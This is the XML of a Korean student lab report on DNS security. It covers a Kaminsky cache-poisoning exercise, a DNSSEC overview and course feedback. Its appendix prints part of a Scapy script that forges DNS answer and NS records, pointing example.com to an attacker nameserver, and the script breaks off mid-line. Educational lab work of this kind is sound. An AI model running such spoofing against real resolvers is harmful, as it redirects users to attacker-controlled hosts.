          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E62D77" w14:textId="71BD8DB6" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr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>6. The Kaminsky Attack 심화</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6AF929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*Sample 코드 활용</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E565F2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*공격 실행 및 결과 설명을 위한 일부 코드를 (필요시) 첨부하고 전체 코드는 부록에 첨부</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1384DCC5" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>targetName의 offset 확인</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab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8"/>
        <w:gridCol w:w="3009"/>
        <w:gridCol w:w="3009"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E65B3A" w14:paraId="0D9602DD" w14:textId="77777777"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61B99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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4A7D3F84" wp14:editId="41FA84CB">
                  <wp:extent cx="1771650" cy="1104900"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="5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104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A2DB8F6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req.bin(0x29)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DA349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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="42C5316B" wp14:editId="2205AF43">
                  <wp:extent cx="1771650" cy="1320800"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="12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70E1345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resp.bin(q: 0x29)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5F92F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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4F216B90" wp14:editId="5028656D">
                  <wp:extent cx="1771650" cy="1333500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1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33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A3565FB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resp.bin(r: 0x32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EF87FFF" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E533DD1" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>c코드 수정 및 공격 실행</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ac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8"/>
        <w:gridCol w:w="3009"/>
        <w:gridCol w:w="3009"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E65B3A" w14:paraId="111943CE" w14:textId="77777777"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74F25" w14:textId="77777777" w:rsidR="00E65B3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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="38C7F8F0" wp14:editId="6AA5F011">
                  <wp:extent cx="1771650" cy="368300"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="6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0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7AF7B70E" wp14:editId="0C369019">
                  <wp:extent cx="1771650" cy="1511300"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="19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51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E241E93" w14:textId="77777777" w:rsidR="00E65B3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targetName의 거리에 따른 offset 값에 따라 다음과 같이 c코드를 수정하였다.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5C8F7" w14:textId="77777777" w:rsidR="00E65B3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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2442B3E0" wp14:editId="2DFB52F8">
                  <wp:extent cx="1771650" cy="1346200"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="16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AEB8439" w14:textId="77777777" w:rsidR="00E65B3A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lastRenderedPageBreak/>
              <w:t>k값이 수정되어 5번과 달리 랜덤문자가 3개가 출력되는 것을 확인할 수 있다.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C460A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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1DAACF95" wp14:editId="3CEA58A7">
                  <wp:extent cx="1771650" cy="1308100"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="4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30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B57C47A" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
            <w:pPr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lastRenderedPageBreak/>
              <w:t>DNS의 chache dump로 attack 문자열 감지</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="114AF441" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038920DB" w14:textId="77777777" w:rsidR="00E65B3A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557CA20" wp14:editId="13F1DDBB">
            <wp:extent cx="3824288" cy="889369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8893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BE30B9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공격 실행 내용은 5번과 같다. 마찬가지로 DNS의 chache dump로 공격 확인 결과 공격에 성공했음을 알 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216007C5" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C16CCE1" w14:textId="164BCF78" w:rsidR="00E65B3A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>7. DNSSEC의 개념과 원리 조사</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BEDC69" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:p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DNSSEC (Domain Name System Security Extensions)은 DNS(도메인 네임 시스템)의 보안 확장을 위한 기술로, DNS 데이터의 무결성과 인증을 보장하기 위해 설계되었다. 이는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IETF (Internet Engineering Task Force)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및 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ICANN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>과 같은 권위 있는 기관에서 정의한 표준을 기반으로 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621A679B" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNSSEC 개요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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>기존 DNS는 설계 당시 보안 기능이 내재되어 있지 않아 DNS 스푸핑(캐시 오염)이나 중간자 공격(MITM)과 같은 취약점에 노출되어 있다. DNSSEC는 DNS 응답이 다음과 같은 성질을 가지도록 보장한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A059FBE" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="240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인증된 데이터: DNS 응답이 올바른 출처에서 온 것임을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE0E39" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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무결성 보장: 데이터 전송 중 변경되지 않았음을 보장한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60045E26" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240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스푸핑 방지: 공격자가 DNS 데이터를 위조하는 것을 방지한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229CAF8C" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240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DNSSEC는 기밀성(암호화)을 제공하지 않으며, 무결성과 인증에 초점을 맞춘다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70075C3B" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b/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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNSSEC의 핵심 원리</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656A437C" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="240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>공개 키 암호화: DNSSEC는 공개 키 기반 구조 (PKI)를 활용하여 DNS 레코드를 디지털 서명한다. 각 DNS 존은 공개-개인 키 쌍을 가진다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ABD639" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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디지털 서명: DNS 레코드가 생성될 때 존의 개인 키로 디지털 서명된다. 이를 검증하기 위해 공개 키가 사용된다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33460AF2" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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신뢰 체인 (Chain of Trust): DNSSEC는 루트 존에서 시작해 서브도메인까지 이어지는 신뢰 체인을 구축한다:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211EAF45" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:num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루트 존의 공개 키는 신뢰의 기반이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3136BD3D" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:num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각 상위 존 (예: .com)은 하위 존 (예: example.com)의 공개 키를 서명한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C069877" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:num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리졸버는 이 체인을 따라 DNS 레코드를 검증할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4413D5C3" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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ZSK와 KSK:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FC6D16" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:num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ZSK (Zone-Signing Key): 존 내의 DNS 레코드를 서명하는 키.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F1B744" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:num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KSK (Key-Signing Key): ZSK를 서명하는 키로, 신뢰 체인을 유지하는 데 사용된다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0910701E" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="240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존재하지 않음에 대한 인증 (Authenticated Denial of Existence): NSEC 및 NSEC3 레코드를 사용해 특정 DNS 레코드가 존재하지 않음을 증명할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A9DC27" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b/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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNSSEC 레코드 유형</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6FB948" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="240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RRSIG (Resource Record Signature): DNS 레코드에 대한 디지털 서명을 포함한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5223D553" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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DNSKEY: RRSIG를 검증하는 데 사용되는 공개 키를 포함한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BBA6A5" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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DS (Delegation Signer): 하위 존의 DNSKEY에 대한 해시 값을 제공한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F4EB73" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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NSEC/NSEC3: 특정 레코드가 존재하지 않음을 증명한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF956A6" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="240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CDS (Child DS): 자동화된 DS 레코드 업데이트를 지원한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7DD6CD" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b/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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNSSEC 동작 원리</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA64EAA" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240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존 서명:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3324A195" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:num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존 관리자가 KSK와 ZSK 키 쌍을 생성한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F579218" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:num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ZSK로 존 데이터를 서명하고, KSK로 ZSK를 서명한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8C68B3" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:num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생성된 서명(RRSIG)과 공개 키(DNSKEY)가 존에 추가된다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E998DE5" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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검증 과정:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E54F34" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:num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DNS 리졸버는 DNSSEC 지원 도메인을 질의하면 DNS 레코드와 함께 RRSIG 및 DNSKEY를 받는다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1C3C87" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:num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리졸버는 다음 단계를 거쳐 검증한다:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794B018C" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:num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RRSIG를 확인하여 DNS 레코드 무결성을 검증한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D875776" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:num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DNSKEY를 검증하기 위해 상위 존의 DS 레코드를 확인한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C333098" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="240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루트 존까지 신뢰 체인을 따라 올라가며 검증한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DC122F" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b/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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>보안 고려사항</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB25C2E" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="240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키 관리: 키가 노출될 위험을 줄이기 위해 주기적으로 키를 교체해야 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38873903" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:num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응답 크기 증가: DNSSEC는 추가 서명과 키로 인해 DNS 응답 크기를 증가시키므로 적절한 대책이 없으면 DNS 증폭 공격의 위험이 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A2FBEF" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240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신뢰 앵커 (Trust Anchor):루트 존의 공개 키가 신뢰 앵커 역할을 한다. 이 키를 업데이트할 때는 신중하게 관리해야 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A7E37B" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b/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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DNSSEC의 장점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CEAF7D" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="240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캐시 오염 방지: 리졸버가 위조된 DNS 응답을 캐시에 저장하지 않도록 보장한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F2506" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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인증: DNS 데이터가 올바른 출처에서 온 것임을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AC567C" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="240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보안 애플리케이션 지원: DANE과 같은 보안 프로토콜과 함께 사용할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457E9DE6" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="24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참고자료: </w:t>
      </w:r>
      <w:hyperlink r:id="rId32">
        <w:r w:rsidR="00E65B3A">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://datatracker.ietf.org/doc/html/rfc4033</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="257C6C01" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="314827F9" w14:textId="0A37B5F3" w:rsidR="00E65B3A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="white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>8. 네트워크보안 수업에 대한 피드백</w:t>
      </w:r>
      <w:r>
        <w:rPr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0"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>네트워크보안 수업을 통해 우분투 가상머신을 접하게 되어 좋았다. 개설된 과목 중 가상환경을 다루는 운영체제 과목이 없어 아쉬웠는데, 이번 수업에서 실습을 통해 리눅스 환경에서 핑을 통해 네트워크 연결을 확인하고, 패킷을 분석하며 데이터가 어떻게 전송되는지 이해할 수 있었다. 이를 통해 네트워크 보안 이론이 실제로 어떻게 적용되는지 체험할 수 있었고, 사고의 폭을 확장할 수 있었다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:br/>
        <w:t>처음 다루는 우분투 가상환경이 서툴고 어려웠지만, 수업이 끝난 후 되돌아보니 배운 것이 훨씬 많다고 느꼈다. 다만, 실습 때 했던 내용을 집에서 재현하려고 할 때 어려움을 겪었다. 핑과 패킷 분석을 다시 해보려고 했으나 기억이 잘 나지 않았다. 실습자료가 있었지만 조금만 더 자세히 설명되어있다면 좋았을 거 같다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38324B7B" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C868738" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00E65B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFE71DE" w14:textId="77777777" w:rsidR="00E65B3A" w:rsidRDefault="00FF20A7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ko-KR"/>
        </w:rPr>
        <w:pict w14:anchorId="6DDE336B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72E8C86E" w14:textId="6657492F" w:rsidR="00E65B3A" w:rsidRPr="00F10630" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>부록</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675E23B6" w14:textId="77777777" w:rsidR="00E65B3A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3번 문제의 전체 코드</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ad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E65B3A" w:rsidRPr="00F10630" w14:paraId="537F35FB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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CF1C8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highlight w:val="cyan"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F10630">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="cyan"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>problem3.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37245861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#!/usr/bin/env python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="085F4919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from scapy.all import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A83FEFA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44D98DD1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ns_domain = 'ns.attacker32.com'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69227253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target_domain = 'example.com'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6988CD77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spoofed_IP = '1.2.3.4'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="403F3CFA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my_iface = 'br-7dfe462efbcd'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55130821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port_num = 53</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="562BB480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target = '10.9.0.53'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65B87C86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my_filter = 'udp and src host {A} and dst port 53'.format(A=target)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="718DFB57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6EF03090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print("Local DNS Cache Poisoning Attack (NS section)")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F83FD2D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55945A5F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def spoof_dns(pkt):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="375BE31A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if (DNS in pkt and target_domain in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B242832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print("Sniffing &amp; Spoofing ...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1526F882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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13184DC0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old_ip = pkt[IP]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="266B6CE8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old_udp = pkt[UDP]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="023DD5EE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old_dns = pkt[DNS]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1944B02E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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B278856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IPpkt = IP(dst=old_ip.src, src=old_ip.dst)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A641DB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UDPpkt = UDP(dport=old_udp.sport, sport=port_num)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="233936B7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64F4E13F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# The Answer Section</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="217214C4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Anssec = DNSRR(rrname=old_dns.qd.qname, type='A', ttl=259200, rdata=spoofed_IP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="309365BE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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21B2E8E4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# The Authority Section</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="679D3583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NSsec = DNSRR(rrname=target_domain, type='NS', ttl=259200, rdata=ns_domain)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="151AD5C2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41872DEC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# Construct the DNS packet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79F98448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DNSpkt = DNS(id=old_dns.id, qd=old_dns.qd, aa=1, qr=1,  </w:t>
            </w:r>
          </w:p>
